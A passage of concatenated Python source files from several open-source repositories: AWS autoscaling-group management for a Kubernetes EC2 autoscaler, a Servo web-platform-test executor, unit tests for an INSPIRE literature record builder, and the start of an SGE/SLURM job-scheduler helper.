spot_request_id = spot_request_m.group('request_id')
if not dry_run:
cancelled = self.cancel_spot_request(asg.region, spot_request_id)
if cancelled:
asg.set_desired_capacity(asg.desired_capacity - 1)
else:
logger.info('[Dry run] Would have cancelled spot request %s and decremented desired capacity.',
spot_request_id)
# don't return here so that we can cancel more spot requests
self._timeouts[asg._id] = None
logger.debug('%s has no timeout', asg.name)
def is_timed_out(self, asg):
timeout = self._timeouts.get(asg._id)
spot_timeout = self._spot_timeouts.get(asg._id)
if timeout and datetime.datetime.now(timeout.tzinfo) < timeout:
return True
if spot_timeout and datetime.datetime.now(pytz.utc) < spot_timeout:
return True
return False
def cancel_spot_request(self, region, request_id):
client = self.session.client('ec2',
region_name=region)
response = client.describe_spot_instance_requests(
SpotInstanceRequestIds=[request_id]
)
if len(response['SpotInstanceRequests']) == 0:
return False
spot_instance_req = response['SpotInstanceRequests'][0]
if spot_instance_req['State'] in ('open', 'active'):
response = client.cancel_spot_instance_requests(
SpotInstanceRequestIds=[request_id]
)
logger.info('Spot instance request %s cancelled.', request_id)
return True
return False
def time_out_spot_asgs(self, asgs):
"""
Using recent spot pricing data from AWS, time out spot instance
ASGs that would be outbid for more than _MAX_OUTBIDS_IN_INTERVAL seconds
"""
region_instance_asg_map = {}
for asg in asgs:
if not asg.is_spot:
continue
instance_asg_map = region_instance_asg_map.setdefault(asg.region, {})
instance_type = asg.launch_config['InstanceType']
instance_asg_map.setdefault(instance_type, []).append(asg)
now = datetime.datetime.now(pytz.utc)
since = now - datetime.timedelta(seconds=self._SPOT_HISTORY_PERIOD)
for region, instance_asg_map in region_instance_asg_map.items():
# Expire old history
history = [item for item in self._spot_price_history.get(region, []) if item['Timestamp'] > since]
if history:
newest_spot_price = max(item['Timestamp'] for item in history)
else:
newest_spot_price = since
client = self.session.client('ec2', region_name=region)
kwargs = {
'StartTime': newest_spot_price,
'InstanceTypes': list(instance_asg_map.keys()),
'ProductDescriptions': ['Linux/UNIX']
}
history.extend(aws_utils.fetch_all(
client.describe_spot_price_history, kwargs, 'SpotPriceHistory'))
self._spot_price_history[region] = history
for instance_type, asgs in instance_asg_map.items():
for asg in asgs:
last_az_bid = {}
outbid_time = {}
bid_price = float(asg.launch_config['SpotPrice'])
for item in history:
if item['InstanceType'] != instance_type:
continue
if float(item['SpotPrice']) > bid_price:
# we would've been outbid!
if item['AvailabilityZone'] in last_az_bid:
time_diff = (last_az_bid[item['AvailabilityZone']] - item['Timestamp'])
else:
time_diff = datetime.timedelta(seconds=0)
outbid_time[item['AvailabilityZone']] = (
outbid_time.get(item['AvailabilityZone'], datetime.timedelta(seconds=0)) +
time_diff)
last_az_bid[item['AvailabilityZone']] = item['Timestamp']
if outbid_time:
avg_outbid_time = sum(t.total_seconds() for t in outbid_time.values()) / len(outbid_time)
else:
avg_outbid_time = 0.0
if avg_outbid_time > self._MAX_OUTBIDS_IN_INTERVAL:
self._spot_timeouts[asg._id] = now + datetime.timedelta(seconds=self._TIMEOUT)
logger.info('%s (%s) is spot timed out until %s (would have been outbid for %ss on average)',
asg.name, asg.region, self._spot_timeouts[asg._id], avg_outbid_time)
else:
self._spot_timeouts[asg._id] = None
class AutoScalingGroup(object):
provider = 'aws'
def __init__(self, client, region, kube_nodes, raw_group, launch_config):
"""
client - boto3 AutoScaling.Client
region - AWS region string
kube_nodes - list of KubeNode objects
raw_group - raw ASG dictionary returned from AWS API
launch_config - raw launch config dictionary returned from AWS API
"""
self.client = client
self.region = region
self.launch_config = launch_config
self.selectors = self._extract_selectors(region, launch_config, raw_group['Tags'])
self.name = raw_group['AutoScalingGroupName']
self.desired_capacity = raw_group['DesiredCapacity']
self.min_size = raw_group['MinSize']
self.max_size = raw_group['MaxSize']
self.is_spot = launch_config.get('SpotPrice') is not None
self.instance_type = launch_config['InstanceType']
self.instance_ids = set(inst['InstanceId'] for inst in raw_group['Instances']
if inst.get('InstanceId'))
self.nodes = [node for node in kube_nodes
if node.instance_id in self.instance_ids]
self.unschedulable_nodes = [n for n in self.nodes if n.unschedulable]
self.no_schedule_taints = {}
self._id = (self.region, self.name)
def _extract_selectors(self, region, launch_config, tags_data):
selectors = {
'aws/type': launch_config['InstanceType'],
'aws/class': launch_config['InstanceType'][0],
'aws/ami-id': launch_config['ImageId'],
'aws/region': region
}
for tag_data in tags_data:
if tag_data['Key'].startswith('kube/'):
selectors[tag_data['Key'][5:]] = tag_data['Value']
# adding kube label counterparts
selectors['beta.kubernetes.io/instance-type'] = selectors['aws/type']
selectors['failure-domain.beta.kubernetes.io/region'] = selectors['aws/region']
return selectors
def is_timed_out(self):
return False
@property
def global_priority(self):
return 0
@property
def actual_capacity(self):
return len(self.nodes)
def set_desired_capacity(self, new_desired_capacity):
"""
sets the desired capacity of the underlying ASG directly.
note that this is for internal control.
for scaling purposes, please use scale() instead.
"""
logger.info("ASG: {} new_desired_capacity: {}".format(
self, new_desired_capacity))
self.client.set_desired_capacity(AutoScalingGroupName=self.name,
DesiredCapacity=new_desired_capacity,
HonorCooldown=False)
self.desired_capacity = new_desired_capacity
return utils.CompletedFuture(True)
def scale(self, new_desired_capacity):
"""
scales the ASG to the new desired capacity.
returns a future with the result True if desired capacity has been increased.
"""
desired_capacity = min(self.max_size, new_desired_capacity)
num_unschedulable = len(self.unschedulable_nodes)
num_schedulable = self.actual_capacity - num_unschedulable
logger.info("Desired {}, currently at {}".format(
desired_capacity, self.desired_capacity))
logger.info("Kube node: {} schedulable, {} unschedulable".format(
num_schedulable, num_unschedulable))
# Try to get the number of schedulable nodes up if we don't have enough, regardless of whether
# group's capacity is already at the same as the desired.
if num_schedulable < desired_capacity:
for node in self.unschedulable_nodes:
if node.uncordon():
num_schedulable += 1
# Uncordon only what we need
if num_schedulable == desired_capacity:
break
if self.desired_capacity != desired_capacity:
if self.desired_capacity == self.max_size:
logger.info("Desired same as max, desired: {}, schedulable: {}".format(
self.desired_capacity, num_schedulable))
return utils.CompletedFuture(False)
scale_up = self.desired_capacity < desired_capacity
# This should be a rare event
# note: this micro-optimization is not worth doing as the race condition here is
# tricky. when ec2 initializes some nodes in the meantime, asg will shutdown
# nodes by its own policy
# scale_down = self.desired_capacity > desired_capacity >= self.actual_capacity
if scale_up:
# should have gotten our num_schedulable to highest value possible
# actually need to grow.
return self.set_desired_capacity(desired_capacity)
logger.info("Doing nothing: desired_capacity correctly set: {}, schedulable: {}".format(
self.name, num_schedulable))
return utils.CompletedFuture(False)
def scale_nodes_in(self, nodes):
"""
scale down asg by terminating the given node.
returns a future indicating when the request completes.
"""
for node in nodes:
try:
# if we somehow end up in a situation where we have
# more capacity than desired capacity, and the desired
# capacity is at asg min size, then when we try to
# terminate the instance while decrementing the desired
# capacity, the aws api call will fail
decrement_capacity = self.desired_capacity > self.min_size
self.client.terminate_instance_in_auto_scaling_group(
InstanceId=node.instance_id,
ShouldDecrementDesiredCapacity=decrement_capacity)
self.nodes.remove(node)
logger.info('Scaled node %s in', node)
except botocore.exceptions.ClientError as e:
if str(e).find("Terminating instance without replacement will "
"violate group's min size constraint.") == -1:
raise e
logger.error("Failed to terminate instance: %s", e)
return utils.CompletedFuture(None)
def contains(self, node):
return node.instance_id in self.instance_ids
def is_match_for_selectors(self, selectors):
for label, value in selectors.items():
if self.selectors.get(label) != value:
return False
return True
def is_taints_tolerated(self, pod):
for label, value in pod.selectors.items():
if self.selectors.get(label) != value:
return False
for key in self.no_schedule_taints:
if not (pod.no_schedule_wildcard_toleration or key in pod.no_schedule_existential_tolerations):
return False
return True
def __str__(self):
return 'AutoScalingGroup({name}, {selectors_hash})'.format(name=self.name, selectors_hash=utils.selectors_to_hash(self.selectors))
def __repr__(self):
return str(self)
class AutoScalingErrorMessages(object):
INSTANCE_LIMIT = re.compile(r'You have requested more instances \((?P<requested>\d+)\) than your current instance limit of (?P<limit>\d+) allows for the specified instance type. Please visit http://aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit. Launching EC2 instance failed.')
VOLUME_LIMIT = re.compile(r'Instance became unhealthy while waiting for instance to be in InService state. Termination Reason: Client.VolumeLimitExceeded: Volume limit exceeded')
CAPACITY_LIMIT = re.compile(r'Insufficient capacity\. Launching EC2 instance failed\.')
SPOT_REQUEST_WAITING = re.compile(r'Placed Spot instance request: (?P<request_id>.+). Waiting for instance\(s\)')
SPOT_REQUEST_CANCELLED = re.compile(r'Spot instance request: (?P<request_id>.+) has been cancelled\.')
SPOT_LIMIT = re.compile(r'Max spot instance count exceeded\. Placing Spot instance request failed\.')
AZ_LIMIT = re.compile(r'We currently do not have sufficient .+ capacity in the Availability Zone you requested (.+)\.')
class AutoScalingCauseMessages(object):
LAUNCH_INSTANCE = re.compile(r'At \d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\dZ an instance was started in response to a difference between desired and actual capacity, increasing the capacity from (?P<original_capacity>\d+) to (?P<target_capacity>\d+)\.')
AZ_BALANCE = re.compile(r'An instance was launched to aid in balancing the group\'s zones\.')
| openai/kubernetes-ec2-autoscaler | autoscaler/autoscaling_groups.py | Python | mit | 24,754 |
import base64
import json
import os
import subprocess
import tempfile
import threading
import uuid
from mozprocess import ProcessHandler
from serve.serve import make_hosts_file
from .base import (ConnectionlessProtocol,
RefTestImplementation,
testharness_result_converter,
reftest_result_converter,
WdspecExecutor,
WebDriverProtocol)
from .process import ProcessTestExecutor
from ..browsers.base import browser_command
from ..webdriver_server import ServoDriverServer
pytestrunner = None
webdriver = None
extra_timeout = 5 # seconds
def write_hosts_file(config):
hosts_fd, hosts_path = tempfile.mkstemp()
with os.fdopen(hosts_fd, "w") as f:
f.write(make_hosts_file(config, "127.0.0.1"))
return hosts_path
class ServoTestharnessExecutor(ProcessTestExecutor):
convert_result = testharness_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, debug_info=None,
pause_after_test=False, **kwargs):
ProcessTestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.pause_after_test = pause_after_test
self.result_data = None
self.result_flag = None
self.protocol = ConnectionlessProtocol(self, browser)
self.hosts_path = write_hosts_file(server_config)
def teardown(self):
try:
os.unlink(self.hosts_path)
except OSError:
pass
ProcessTestExecutor.teardown(self)
def do_test(self, test):
self.result_data = None
self.result_flag = threading.Event()
args = [
"--hard-fail", "-u", "Servo/wptrunner",
"-Z", "replace-surrogates", "-z", self.test_url(test),
]
for stylesheet in self.browser.user_stylesheets:
args += ["--user-stylesheet", stylesheet]
for pref, value in test.environment.get('prefs', {}).iteritems():
args += ["--pref", "%s=%s" % (pref, value)]
if self.browser.ca_certificate_path:
args += ["--certificate-path", self.browser.ca_certificate_path]
args += self.browser.binary_args
debug_args, command = browser_command(self.binary, args, self.debug_info)
self.command = command
if self.pause_after_test:
self.command.remove("-z")
self.command = debug_args + self.command
env = os.environ.copy()
env["HOST_FILE"] = self.hosts_path
env["RUST_BACKTRACE"] = "1"
if not self.interactive:
self.proc = ProcessHandler(self.command,
processOutputLine=[self.on_output],
onFinish=self.on_finish,
env=env,
storeOutput=False)
self.proc.run()
else:
self.proc = subprocess.Popen(self.command, env=env)
try:
timeout = test.timeout * self.timeout_multiplier
# Now wait to get the output we expect, or until we reach the timeout
if not self.interactive and not self.pause_after_test:
wait_timeout = timeout + 5
self.result_flag.wait(wait_timeout)
else:
wait_timeout = None
self.proc.wait()
proc_is_running = True
if self.result_flag.is_set():
if self.result_data is not None:
result = self.convert_result(test, self.result_data)
else:
self.proc.wait()
result = (test.result_cls("CRASH", None), [])
proc_is_running = False
else:
result = (test.result_cls("TIMEOUT", None), [])
if proc_is_running:
if self.pause_after_test:
self.logger.info("Pausing until the browser exits")
self.proc.wait()
else:
self.proc.kill()
except KeyboardInterrupt:
self.proc.kill()
raise
return result
def on_output(self, line):
prefix = "ALERT: RESULT: "
line = line.decode("utf8", "replace")
if line.startswith(prefix):
self.result_data = json.loads(line[len(prefix):])
self.result_flag.set()
else:
if self.interactive:
print line
else:
self.logger.process_output(self.proc.pid,
line,
" ".join(self.command))
def on_finish(self):
self.result_flag.set()
class TempFilename(object):
def __init__(self, directory):
self.directory = directory
self.path = None
def __enter__(self):
self.path = os.path.join(self.directory, str(uuid.uuid4()))
return self.path
def __exit__(self, *args, **kwargs):
try:
os.unlink(self.path)
except OSError:
pass
class ServoRefTestExecutor(ProcessTestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, binary=None, timeout_multiplier=1,
screenshot_cache=None, debug_info=None, pause_after_test=False,
**kwargs):
ProcessTestExecutor.__init__(self,
browser,
server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = ConnectionlessProtocol(self, browser)
self.screenshot_cache = screenshot_cache
self.implementation = RefTestImplementation(self)
self.tempdir = tempfile.mkdtemp()
self.hosts_path = write_hosts_file(server_config)
def teardown(self):
try:
os.unlink(self.hosts_path)
except OSError:
pass
os.rmdir(self.tempdir)
ProcessTestExecutor.teardown(self)
def screenshot(self, test, viewport_size, dpi):
full_url = self.test_url(test)
with TempFilename(self.tempdir) as output_path:
debug_args, command = browser_command(
self.binary,
[
"--hard-fail", "--exit",
"-u", "Servo/wptrunner",
"-Z", "disable-text-aa,load-webfonts-synchronously,replace-surrogates",
"--output=%s" % output_path, full_url
] + self.browser.binary_args,
self.debug_info)
for stylesheet in self.browser.user_stylesheets:
command += ["--user-stylesheet", stylesheet]
for pref, value in test.environment.get('prefs', {}).iteritems():
command += ["--pref", "%s=%s" % (pref, value)]
command += ["--resolution", viewport_size or "800x600"]
if self.browser.ca_certificate_path:
command += ["--certificate-path", self.browser.ca_certificate_path]
if dpi:
command += ["--device-pixel-ratio", dpi]
# Run ref tests in headless mode
command += ["-z"]
self.command = debug_args + command
env = os.environ.copy()
env["HOST_FILE"] = self.hosts_path
env["RUST_BACKTRACE"] = "1"
if not self.interactive:
self.proc = ProcessHandler(self.command,
processOutputLine=[self.on_output],
env=env)
try:
self.proc.run()
timeout = test.timeout * self.timeout_multiplier + 5
rv = self.proc.wait(timeout=timeout)
except KeyboardInterrupt:
self.proc.kill()
raise
else:
self.proc = subprocess.Popen(self.command,
env=env)
try:
rv = self.proc.wait()
except KeyboardInterrupt:
self.proc.kill()
raise
if rv is None:
self.proc.kill()
return False, ("EXTERNAL-TIMEOUT", None)
if rv != 0 or not os.path.exists(output_path):
return False, ("CRASH", None)
with open(output_path) as f:
# Might need to strip variable headers or something here
data = f.read()
return True, base64.b64encode(data)
def do_test(self, test):
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def on_output(self, line):
line = line.decode("utf8", "replace")
if self.interactive:
print line
else:
self.logger.process_output(self.proc.pid,
line,
" ".join(self.command))
class ServoDriverProtocol(WebDriverProtocol):
server_cls = ServoDriverServer
class ServoWdspecExecutor(WdspecExecutor):
protocol_cls = ServoDriverProtocol
| dati91/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/executors/executorservo.py | Python | mpl-2.0 | 9,499 |
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE-SCHEMAS.
# Copyright (C) 2016, 2019 CERN.
#
# INSPIRE-SCHEMAS is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE-SCHEMAS is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE-SCHEMAS; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
import pytest
from jsonschema import ValidationError
from inspire_schemas.builders.literature import LiteratureBuilder, is_citeable
from inspire_schemas.utils import load_schema, validate
@pytest.mark.parametrize(
'expected_result,formdata',
[
(
True,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
'artid': '2550'
}
]
), (
True,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
'page_start': '28'
}
]
), (
False,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
}
]
), (
False,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'page_start': '25'
}
]
)
]
)
def test_is_citeable(expected_result, formdata):
assert is_citeable(formdata) is expected_result
def test_append_to():
formdata = ''
builder = LiteratureBuilder("test")
expected_result = None
builder._append_to('test_field', formdata)
assert builder.record.get('test_field') is expected_result
formdata = 'value'
expected_result = ['value']
builder._append_to('test_field_2', formdata)
assert builder.record.get('test_field_2') == expected_result
def test_sourced_dict_local_source():
builder = LiteratureBuilder('global')
expected = {
'source': 'local',
'value': 'foo'
}
result = builder._sourced_dict('local', value='foo')
assert result == expected
def test_sourced_dict_global_source():
builder = LiteratureBuilder('global')
expected = {
'source': 'global',
'value': 'foo'
}
result = builder._sourced_dict(None, value='foo')
assert result == expected
def test_sourced_dict_no_source():
builder = LiteratureBuilder()
expected = {
'value': 'foo'
}
result = builder._sourced_dict(None, value='foo')
assert result == expected
def test_add_figure():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='https://www.example.com/url',
description='description',
filename='filename',
original_url='http://www.example.com/original_url'
)
expected = [
{
'caption': 'caption',
'key': 'key',
'label': 'label',
'material': 'publication',
'source': 'source',
'url': 'https://www.example.com/url',
'filename': 'filename',
'original_url': 'http://www.example.com/original_url'
},
]
result = builder.record
assert validate(result['figures'], subschema) is None
assert expected == result['figures']
for key in subschema['items']['properties'].keys():
assert key in result['figures'][0]
def test_add_figure_inspire_next():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='/api/files/a1/123',
description='description',
original_url='http://www.example.com/original_url'
)
expected = [
{
'caption': 'caption',
'key': 'key',
'label': 'label',
'material': 'publication',
'source': 'source',
'url': '/api/files/a1/123',
'original_url': 'http://www.example.com/original_url'
},
]
result = builder.record
assert validate(result['figures'], subschema) is None
assert expected == result['figures']
def test_add_figure_fails_on_duplicated_key():
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='url',
description='description',
filename='filename',
original_ur='original_url'
)
with pytest.raises(ValueError):
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='url',
description='description',
filename='filename',
original_ur='original_url'
)
def test_add_figure_fails_on_non_file_api_relative_url():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
with pytest.raises(ValidationError):
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='/not/api/url/for/files',
description='description',
original_url='http://www.example.com/original_url'
)
result = builder.record
validate(result['figures'], subschema)
def test_add_document():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='https://www.example.com/url',
filename='filename'
)
expected = [
{
'description': 'description',
'fulltext': True,
'hidden': True,
'key': 'key',
'material': 'preprint',
'original_url': 'http://www.example.com/original_url',
'source': 'source',
'url': 'https://www.example.com/url',
'filename': 'filename'
},
]
result = builder.record
assert validate(result['documents'], subschema) is None
assert expected == result['documents']
for key in subschema['items']['properties'].keys():
assert key in result['documents'][0]
def test_add_document_inspire_next():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='/api/files/a1/123',
)
expected = [
{
'description': 'description',
'fulltext': True,
'hidden': True,
'key': 'key',
'material': 'preprint',
'original_url': 'http://www.example.com/original_url',
'source': 'source',
'url': '/api/files/a1/123',
},
]
result = builder.record
assert validate(result['documents'], subschema) is None
assert expected == result['documents']
def test_add_document_fails_on_existing_key():
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='url',
filename='filename'
)
with pytest.raises(ValueError):
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='url',
filename='filename'
)
def test_add_document_fails_on_non_file_api_relative_url():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
with pytest.raises(ValidationError):
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='/not/api/url/for/files',
filename='filename'
)
result = builder.record
validate(result['documents'], subschema)
def test_make_author():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
affiliations=['CERN', 'SLAC'],
source='submitter',
raw_affiliations=['CERN, 1211 Geneva', 'SLAC, Stanford'],
emails=['[email protected]'],
ids=[('INSPIRE BAI', 'J.Smith.1')],
alternative_names=['Johnny Smith']
)
expected = {
'full_name': 'Smith, John',
'affiliations': [
{'value': 'CERN'},
{'value': 'SLAC'},
],
'raw_affiliations': [
{
'value': 'CERN, 1211 Geneva',
'source': 'submitter'
},
{
'value': 'SLAC, Stanford',
'source': 'submitter',
}
],
'emails': ['[email protected]'],
'ids': [
{
'schema': 'INSPIRE BAI',
'value': 'J.Smith.1',
}
],
'alternative_names': ['Johnny Smith'],
}
assert validate([result], subschema) is None
assert expected == result
def test_add_keyword():
schema = load_schema('hep')
subschema = schema['properties']['keywords']
builder = LiteratureBuilder(source='Publisher')
builder.add_keyword('29.27.Fh', schema='PACS')
result = builder.record['keywords']
expected = [
{
'value': '29.27.Fh',
'schema': 'PACS',
'source': 'Publisher',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_field_not_added_when_only_material():
builder = LiteratureBuilder(source='Publisher')
builder.add_publication_info(material='Publication')
assert 'publication_info' not in builder.record
def test_add_doi_handles_none():
builder = LiteratureBuilder()
builder.add_doi(None)
result = builder.record
assert 'dois' not in result
def test_add_doi_normalizes_doi():
schema = load_schema('hep')
subschema = schema['properties']['dois']
builder = LiteratureBuilder()
builder.add_doi('doi.org/10.1234/foo')
result = builder.record['dois']
expected = [
{
'value': '10.1234/foo',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_doi_with_invalid_value():
builder = LiteratureBuilder()
builder.add_doi('invalid doi value, ignore me')
result = builder.record
assert 'dois' not in result
def test_add_license_doesnt_overwrite_name_if_no_url():
schema = load_schema('hep')
subschema = schema['properties']['license']
builder = LiteratureBuilder()
builder.add_license(license='foo')
result = builder.record['license']
expected = [
{
'license': 'foo',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_repr_handles_source_none():
builder = LiteratureBuilder()
assert repr(builder).startswith('LiteratureBuilder(source=None, record={')
def test_repr_handles_source_present():
builder = LiteratureBuilder('publisher')
assert repr(builder).startswith(
"LiteratureBuilder(source='publisher', record={"
)
def test_add_reference():
builder = LiteratureBuilder()
reference = {
"reference": {
"authors": [
{
"full_name": "Smith, J."
}
],
"label": "1",
"publication_info": {
"year": 1996
}
}
}
builder.add_reference(reference)
assert builder.record['references'] == [reference]
def test_add_accelerator_experiment():
builder = LiteratureBuilder()
legacy_name = 'FNAL-E-0900'
experiment_record = {'$ref': 'http://url/api/experiments/123'}
builder.add_accelerator_experiment('FNAL-E-0900', record=experiment_record)
assert builder.record['accelerator_experiments'] == [{
'legacy_name': legacy_name,
'record': experiment_record
}]
def test_publication_info_public_note():
schema = load_schema('hep')
subschema = schema['properties']['public_notes']
builder = LiteratureBuilder(source="APS")
builder.add_publication_info(journal_title="Phys. Rev. B")
expected = [
{
'source': 'APS',
'value': 'Submitted to Phys. Rev. B',
}
]
result = builder.record['public_notes']
assert validate(result, subschema) is None
assert expected == result
assert 'publication_info' not in builder.record
def test_preprint_date_normalizes_date():
builder = LiteratureBuilder()
builder.add_preprint_date('12 April 2010')
result = builder.record['preprint_date']
expected = '2010-04-12'
assert expected == result
def test_imprint_date_normalizes_date():
builder = LiteratureBuilder()
builder.add_imprint_date('19 September 2005')
result = builder.record['imprints']
expected = [
{
'date': '2005-09-19'
}
]
assert expected == result
def test_add_book_normalizes_date():
builder = LiteratureBuilder()
builder.add_book(date='9 November 1990')
result = builder.record['imprints']
expected = [
{
'date': '1990-11-09'
}
]
assert expected == result
def test_add_isbn_normalizes_isbn():
builder = LiteratureBuilder()
builder.add_isbn(isbn='978-3-642-23908-3')
result = builder.record['isbns']
expected = [
{
'value': '9783642239083'
}
]
assert expected == result
def test_add_parent_isbn_normalizes_isbn():
builder = LiteratureBuilder()
builder.add_publication_info(parent_isbn='978-3-642-23908-3')
result = builder.record['publication_info']
expected = [
{
'parent_isbn': '9783642239083'
}
]
assert expected == result
def test_make_author_handles_none_in_id_value():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
ids=[('INSPIRE BAI', None)],
)
expected = {
'full_name': 'Smith, John',
}
assert validate([result], subschema) is None
assert expected == result
def test_make_author_sets_record():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
author_record = {'$ref': 'http://url/api/authors/1234'}
result = builder.make_author(
'Smith, John',
record=author_record,
)
expected = {
'full_name': 'Smith, John',
'record': author_record,
}
assert validate([result], subschema) is None
assert expected == result
def test_make_author_handles_none_in_id_schema():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
ids=[(None, 'J.Smith.1')],
)
expected = {
'full_name': 'Smith, John',
}
assert validate([result], subschema) is None
assert expected == result
def test_add_external_system_identifier():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier('12345', 'osti')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '12345',
'schema': 'osti',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_many_external_system_identifier():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier('5758037', 'osti')
builder.add_external_system_identifier('1992PhRvD..45..124K', 'ADS')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '5758037',
'schema': 'osti',
},
{
'value': '1992PhRvD..45..124K',
'schema': 'ADS',
},
]
assert validate(result, subschema) is None
assert expected == result
def test_add_external_system_identifier_kwargs():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier(schema='osti', extid='12345')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '12345',
'schema': 'osti',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_external_system_identifier_empty_kwargs():
builder = LiteratureBuilder()
builder.add_external_system_identifier(schema='', extid='')
assert 'external_system_identifiers' not in builder.record
| inspirehep/inspire-schemas | tests/unit/test_literature_builder.py | Python | gpl-2.0 | 19,286 |
"""
Module to help working with scheduler such as sun grid engine (SGE) or
Simple Linux Utility for Resource Management (SLURM).
Main functions covered are :
- get the list of names of all running jobs;
- generate easily a submission query for a job.
"""
# Authors: Arnaud Joly
#
# License: BSD 3 clause
import subprocess
from xml.etree import ElementTree
__all__ = [
"queued_or_running_jobs",
"submit"
]
def _sge_queued_or_running_jobs():
try:
xml = subprocess.check_output("qstat -xml", shell=True,
stderr=subprocess.PIPE)
tree = ElementTree.fromstring(xml)
return [leaf.text for leaf in tree.iter("JB_name")]
except subprocess.CalledProcessError:
# qstat is not available
return []
def _slurm_queued_or_running_jobs():
try:
out = subprocess.check_output("squeue --noheader -o %j", shell=True,
stderr=subprocess.PIPE)
out = out.split("\n")[:-1]
return out
except subprocess.CalledProcessError:
# squeue is not available
return []
def queued_or_running_jobs():
"""Return the names of the queued or running jobs under SGE and SLURM
The list of jobs could be either the list of all jobs on the scheduler
or only the jobs associated to the user calling this function.
The default behavior is dependant upon scheduler configuration.
Try ``qstat`` in SGE or ``squeue`` in SLURM to know which behavior it
follows.
Returns
-------
out : list of string,
Returned a list containing all the names of the jobs that are running
or queued under the SGE or SLURM scheduler.
"""
out = []
for queued_or_running in (_sge_queued_or_running_jobs,
_slurm_queued_or_running_jobs):
out.extend(queued_or_running())
return out
_SGE_TEMPLATE = {
"job_name": '-N "%s"',
"memory": "-l h_vmem=%sM",
"time": "-l h_rt=%s",
"email": "-M %s",
"email_options": "-m %s",
"log_directory": "-o %s/$JOB_NAME.$JOB_ID",
}
_SLURM_TEMPLATE = {
"job_name": '--job-name=%s',
"memory": "--mem=%s",
"time": "--time=%s",
"email": "--mail-user=%s",
"email_options": "--mail-type=%s",
"log_directory": "-o %s/%s.txt",
}
_TEMPLATE = {
"sge": _SGE_TEMPLATE,
"slurm": _SLURM_TEMPLATE
}
_LAUNCHER = {
"sge": "qsub",
"slurm": "sbatch",
}
def submit(job_command, job_name="job", time="24:00:00", memory=4000,
email=None, email_options=None, log_directory=None, backend="slurm",
shell_script="#!/bin/bash"):
"""Write the submission query (without script)
Parameters
----------
job_command : str,
Command associated to the job, e.g. 'python main.py'.
job_name : str, optional (default="job")
Name of the job.
time : str, optional (default="24:00:00")
Maximum time format "HH:MM:SS".
memory : str, optional (default=4000)
Maximum virtual memory in mega-bytes
email : str, optional (default=None)
Email where job information is sent. If None, no email is asked
to be sent.
email_options : str, optional (default=None)
Specify email options:
- SGE : Format char from beas (begin,end,abort,stop) for SGE.
